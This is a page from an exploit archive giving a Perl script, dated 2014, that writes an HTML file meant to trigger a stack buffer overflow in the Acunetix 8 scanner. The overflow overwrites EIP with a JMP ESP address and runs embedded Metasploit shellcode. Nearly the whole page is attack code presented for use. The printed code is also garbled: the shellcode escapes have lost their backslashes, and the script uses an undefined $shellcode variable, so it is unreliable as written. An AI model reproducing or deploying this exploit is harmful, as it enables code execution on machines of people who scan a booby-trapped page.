Home / exploits

PDF

Acunetix 8 Stack Buffer Overflow

Posted on 25 April 2014

# Exploit Title: Acunetix Stack Based overflow
# Date: 24/04/14
# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Vendor Homepage: http://www.acunetix.com/
# Software Link: http://www.acunetix.com/vulnerability-scanner/download/
# Version: 8 build 20120704
# Tested on: XP
#
# http://www.reddit.com/r/netsec/comments/23tbn6/pwn_the_n00bs_acunetix_0day/
#

#This exploit generates HTML file, if this HTML will be scanned with ACUNETIX, shell will be executed.

my $file= "index.html";
my $HTMLHeader1 = "<html>
";
my $HTMLHeader2 = "
</html>";
my $IMGheader1 = "<img style="opacity:0.0;filter:alpha(opacity=0);" src=http://";
my $IMGheader2 = "><br>
";

my $DomainName1 = "XSS";
my $DomainName2 = "CSRF";
my $DomainName3 = "DeepScan";
my $DomainName4 = "NetworkScan";
my $DomainName5 = "DenialOfService";
my $GeneralDotPadding = "." x 190;

my $ExploitDomain = "SQLInjection";
my $DotPadding = "." x (202-length($ExploitDomain));
my $Padding1 = "A"x66;
my $Padding2 = "B"x4;
my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flow
my $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL).

# windows/exec - 461 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# CMD=calc.exe
my $shellcode2 =
"x54x59x49x49x49x49x49x49x49x49x49x49x51x5a" .
"x56x54x58x33x30x56x58x34x41x50x30x41x33x48" .
"x48x30x41x30x30x41x42x41x41x42x54x41x41x51" .
"x32x41x42x32x42x42x30x42x42x58x50x38x41x43" .
"x4ax4ax49x4bx4cx5ax48x4bx39x33x30x45x50x53" .
"x30x33x50x4cx49x4ax45x46x51x48x52x52x44x4c" .
"x4bx36x32x50x30x4cx4bx51x42x34x4cx4cx4bx51" .
"x42x35x44x4cx4bx52x52x37x58x54x4fx48x37x51" .
"x5ax57x56x50x31x4bx4fx46x51x4fx30x4ex4cx37" .
"x4cx45x31x33x4cx45x52x36x4cx47x50x59x51x58" .
"x4fx54x4dx53x31x49x57x4dx32x4cx30x50x52x46" .
"x37x4cx4bx31x42x44x50x4cx4bx30x42x57x4cx45" .
"x51x4ex30x4cx4bx57x30x34x38x4bx35x59x50x42" .
"x54x31x5ax53x31x48x50x36x30x4cx4bx37x38x52" .
"x38x4cx4bx46x38x51x30x43x31x49x43x4ax43x47" .
"x4cx47x39x4cx4bx56x54x4cx4bx45x51x48x56x36" .
"x51x4bx4fx56x51x39x50x4ex4cx39x51x38x4fx54" .
"x4dx43x31x49x57x56x58x4bx50x43x45x4ax54x35" .
"x53x53x4dx4bx48x57x4bx43x4dx57x54x34x35x5a" .
"x42x31x48x4cx4bx56x38x37x54x33x31x48x53x32" .
"x46x4cx4bx34x4cx50x4bx4cx4bx56x38x35x4cx43" .
"x31x58x53x4cx4bx43x34x4cx4bx43x31x4ex30x4b" .
"x39x51x54x31x34x56x44x51x4bx51x4bx43x51x36" .
"x39x51x4ax30x51x4bx4fx4bx50x50x58x51x4fx30" .
"x5ax4cx4bx54x52x4ax4bx4bx36x31x4dx33x5ax53" .
"x31x4cx4dx4bx35x4fx49x55x50x35x50x35x50x46" .
"x30x42x48x36x51x4cx4bx32x4fx4bx37x4bx4fx58" .
"x55x4fx4bx4bx50x45x4dx36x4ax34x4ax43x58x4e" .
"x46x4dx45x4fx4dx4dx4dx4bx4fx39x45x57x4cx43" .
"x36x43x4cx44x4ax4dx50x4bx4bx4dx30x42x55x34" .
"x45x4fx4bx30x47x54x53x34x32x42x4fx52x4ax33" .
"x30x51x43x4bx4fx59x45x45x33x33x51x52x4cx35" .
"x33x46x4ex35x35x53x48x52x45x45x50x41x41";

my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2;

my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2;
open($FILE,">$file");
print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2;
close($FILE);
print "Acunetix Killer File Created successfully
";

 

TOP